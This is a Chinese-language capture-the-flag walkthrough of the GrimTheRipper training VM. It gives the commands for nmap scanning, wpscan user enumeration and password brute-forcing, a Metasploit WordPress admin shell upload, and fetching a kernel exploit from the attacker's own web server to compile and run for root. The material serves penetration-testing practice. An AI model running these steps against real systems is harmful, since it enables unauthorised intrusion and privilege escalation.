GrimTheRipper 靶机

下载地址

 

配置的环境：

kali：192.168.25.131         GrimTheRipper 靶机 和 kali 在同一C段

 

开搞

nmap扫描网段，发现存活主机

nmap -sP 192.168.25.0/24

 

发现主机 192.168.25.135，判定为 GrimTheRipper 靶机 ，继续使用nmap获取详细信息

nmap -A -p 1-65535 192.168.25.135

 

很常规，开了个ssh和http，访问站点 http://192.168.25.135 看看，这制作镜像的是个逗比，放了个图，看看源代码

啥也没有

 

扫目录就完事了，启动俺的御剑，得到反爬虫 robots.txt，页面出现 /index2.html

 

访问/index2.html

 

本来我的思路的post提交 shit，想了想太变态了，查看源代码发现字符

<!--THpFd01UQXhNREU9IHRyeSBoYXJk-->

 

base64解密得到又一串，继续base64解密，得到路径 /1010101

 

访问/1010101，看到了熟悉的CMS，wordpress

 

访问页面随便点了点，我测试了下，看看有没有注入点，SQLMAP启动无果

查看源代码发现是3.5版本，随便找了个对应的有个插件RCE漏洞，测试发现没有安装该插件，

直接启动 wpsan，收集站点用户名，准备爆破，得到admin用户（也可以把能rce对应的漏洞都试试）

扫描wordpress用户
wpscan --url http://192.168.25.135/1010101/wordpress/ --enumerate u

 

加载字典，爆破得到密码 Password@123

暴力破解密码
wpscan --url http://192.168.25.135/1010101/wordpress/ --usernames admin -P /root/rockyou.txt

 

访问/wp-admin 跳转到后台登录界面，这边作者搞的有点问题，跳转的全都是是本地127.0.0.1 URL，需要自己改一下，然后登录

 

登录跳转也是跳本地，佛了，要不你改一下表单跳转进入对应ip的后台，或者直接启动msf直接上传shell

use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.25.135
set username admin
set password Password@123
set targeturi /1010101/wordpress/
exploit  攻击

 

show options检查一下

 

ok，返回了 meterpreter ，攻击成功，sysinfo查看信息，应该可以直接内核exp提权

 

返回一个shell

python -c "import pty;pty.spawn('/bin/bash')"

 

提权

ok，目前信息如下

 

直接用kali的搜索功能搜exp

searchsploit 12.04 | grep 3.13.0

 

下载编译运行

我们这边需要搭一个简单的http服务，让靶机可以访问下载这个exp，直接kali起一个apache服务

 

浏览器访问 kali，得到如下页面就成功啦

 

我们把对应的exp放到 web路径下默认为（/var/www/html）

 

然后在靶机上下载就可以啦，默认路径没有权限，我们放到 tmp临时路径下（权限大）

 

编译运行exp，成功拿下！

 

总结： 这靶机没什么技术含量，就是熟悉熟悉流程，不过作者应该是个逗比 ：）